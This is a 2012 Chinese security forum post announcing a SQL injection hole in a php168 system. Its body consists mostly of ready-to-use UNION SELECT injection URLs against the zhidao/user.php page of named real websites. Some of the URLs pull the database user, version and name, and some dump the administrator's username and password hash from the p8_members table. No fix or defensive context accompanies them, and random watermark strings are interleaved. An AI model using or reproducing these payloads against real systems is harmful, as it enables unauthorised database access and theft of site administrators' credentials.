找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2975|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
' D2 @. S  z2 D* W                                                         
( w2 J! \) ?. i, N4 u                                       6 B4 F& K5 ]% Z: D# Q/ X/ C" k

: H- Z& g8 j+ ~' {8 ~* m- A# G
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
9 g' a# ]3 q" o% p) Y                                                     
* W0 U+ T3 \) v: Z! Y  v/ d                                                                  
7 b9 X' K6 A7 N1 `6 W                                                        4 g0 J' f  U5 k9 {: l
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
4 q; R7 S- ]; P3 R4 W& b9 @; T) a+ X: Y- }
" D; B2 g  `0 w# z2 t+ Y! T6 g; o5 W
$ N& M9 x8 X5 m$ C4 X  z" B
                                                              b" @3 M9 F1 Y8 o3 c

& B7 m- d$ |; W: x9 e% \http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--7 |: G; I7 a7 ?6 G4 _
/ k/ `; H/ h- h0 V

) t* J7 L  u0 L* \
# C3 }: y& S1 a0 J& i- ^5 Y3 v                                                                    
, @: a: }, G& i) b/ H2 n

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表